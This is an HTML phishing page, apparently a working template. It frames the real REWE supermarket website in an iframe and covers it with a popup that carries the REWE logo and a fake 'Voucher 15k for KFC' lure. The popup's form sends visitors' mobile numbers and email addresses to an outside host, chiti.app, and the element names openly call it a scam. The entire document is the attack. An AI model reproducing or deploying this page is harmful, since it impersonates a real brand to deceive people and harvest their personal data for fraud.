
<html>
    <head>
      <title>Rewe - Fake</title>
      <style>
        body {
          position: relative;
          margin: 0;
        }
  
        iframe, #fake {
          border: none;
          position: absolute;
          width: 100%;
          height: 100%;
        }
        
        #fake {
          z-index: 9999;
          background: rgba(0, 0, 0, 0.3);
        }
        
        #scam-form {
          position: absolute;
          width: 500px;
          top: 30vh;
          left: 30vw;
          background-color: white;
          font-family: arial;
          padding: 1rem;
          border-radius: 10px;
        }
        
        #scam-form form {
          margin-bottom: 0;
        }
        
        #scam-form input, #scam-form button {
          display: block;
          heigth: 15px;
          padding: 6px;
          width: 100%;
          margin-bottom: 8px;
        }
        
        #scam-form button {
          border-radius: 6px;
          background: #c00!important;
          border: 0;
          cursor: pointer;
          color: white;
          font-weight: bold;
          font-size: 15px;
          padding: 10px;
          margin-top: 12px;
          margin-bottom: 0;
        }
        
      </style>
    </head>
    <body>
      <iframe id="fr" src="https://rewe.de"></iframe>
      <div id="fake">
        <div id="scam-form">
          <img src="https://i.rewe-static.de/content/cms/7b00c09f/img/logos/rewe-logo-2016.svg" />
          <h3>
            Voucher 15k for KFC, Horay!!!Horay!!!
          </h3>
          <form action="https://chiti.app" method="GET">
            <input name="mobile" placeholder="Mobile number" />
            <input name="email" placeholder="Email" />
            <button>
              Get it
            </button>
          </form>
        </div> 
      </div>
    </body>
    <script>
    </script>
  </html>
